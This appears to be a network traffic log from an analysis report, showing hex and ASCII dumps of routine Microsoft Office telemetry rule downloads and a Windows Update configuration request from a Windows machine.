                                                                                                                                                                            2024-10-28 18:12:17 UTC16384INData Raw: 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 39 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20
                                                                                                                                                                            Data Ascii: _Count"> <C> <S T="31" /> </C> </C> <C T="U32" I="19" O="false" N="Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S
                                                                                                                                                                            2024-10-28 18:12:17 UTC16384INData Raw: 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22
                                                                                                                                                                            Data Ascii: <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3"
                                                                                                                                                                            2024-10-28 18:12:17 UTC16384INData Raw: 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65
                                                                                                                                                                            Data Ascii: </L> <R> <V V="0" T="I32" /> </R> </O> </F> </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false
                                                                                                                                                                            2024-10-28 18:12:17 UTC16384INData Raw: 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 36 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20
                                                                                                                                                                            Data Ascii: T="B" /> </R> </O> </F> <F T="6"> <O T="AND"> <L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" />
                                                                                                                                                                            2024-10-28 18:12:17 UTC16384INData Raw: 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 36 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54
                                                                                                                                                                            Data Ascii: O> </F> <F T="6"> <O T="EQ"> <L> <S T="2" F="HttpStatus" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            4192.168.2.4497554.245.163.56443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:17 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=pUkVGK2e4kgEmE9&MD=mNzcmBgT HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept: */*
                                                                                                                                                                            User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                            Host: slscr.update.microsoft.com
                                                                                                                                                                            2024-10-28 18:12:18 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                            Expires: -1
                                                                                                                                                                            Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                            ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                                                                                                                                            MS-CorrelationId: 999929c3-dd83-44dc-8676-012a1fb38e47
                                                                                                                                                                            MS-RequestId: d458b39e-0f0f-4f0c-934d-5b2c4dc6a5c7
                                                                                                                                                                            MS-CV: XjHqGozIH0WBazVv.0
                                                                                                                                                                            X-Microsoft-SLSClientCache: 1440
                                                                                                                                                                            Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:17 GMT
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Length: 30005
                                                                                                                                                                            2024-10-28 18:12:18 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                                                                                                                                                            Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                                                                                                                                                            2024-10-28 18:12:18 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                                                                                                                                                            Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            5192.168.2.44976013.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:18 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:18 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:18 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 408
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                            ETag: "0x8DC582BB56D3AFB"
                                                                                                                                                                            x-ms-request-id: 7920d540-e01e-0085-1f11-29c311000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181218Z-17fbfdc98bb8lw78ye6qppf97g00000005yg000000002vgc
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:18 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            6192.168.2.44975813.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:18 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:18 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:18 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 2980
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                                                            ETag: "0x8DC582BA80D96A1"
                                                                                                                                                                            x-ms-request-id: 834668b8-301e-0052-121c-2765d6000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181218Z-17fbfdc98bb8mkvjfkt54wa538000000037g00000000fsnw
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:18 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            7192.168.2.44975713.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:18 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:18 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:18 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 450
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                                                                                                                                                                            ETag: "0x8DC582BD4C869AE"
                                                                                                                                                                            x-ms-request-id: 9a0790d9-e01e-0052-7cad-26d9df000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181218Z-17fbfdc98bbfmg5wrf1ctcuuun00000005s000000000azck
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:18 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            8192.168.2.44975913.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:18 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:18 UTC584INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:18 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 2160
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                            ETag: "0x8DC582BA3B95D81"
                                                                                                                                                                            x-ms-request-id: c4ab37c7-901e-002a-3417-267a27000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181218Z-17fbfdc98bbwmxz5amc6q625w000000001bg00000000bg1z
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:18 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            9192.168.2.44975613.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:18 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:18 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:18 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 3788
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                                            ETag: "0x8DC582BAC2126A6"
                                                                                                                                                                            x-ms-request-id: 85f3058c-201e-00aa-6c2c-283928000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181218Z-r1755647c66tgwsmrrc4e69sk000000004pg0000000096er
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:18 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            10192.168.2.44976513.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:19 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:19 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:19 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 632
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                            ETag: "0x8DC582BB6E3779E"
                                                                                                                                                                            x-ms-request-id: 1f7bc680-101e-0065-6904-274088000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181219Z-17fbfdc98bbwj6cp6df5812g4s0000000710000000000r27
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            Accept-Ranges: bytes
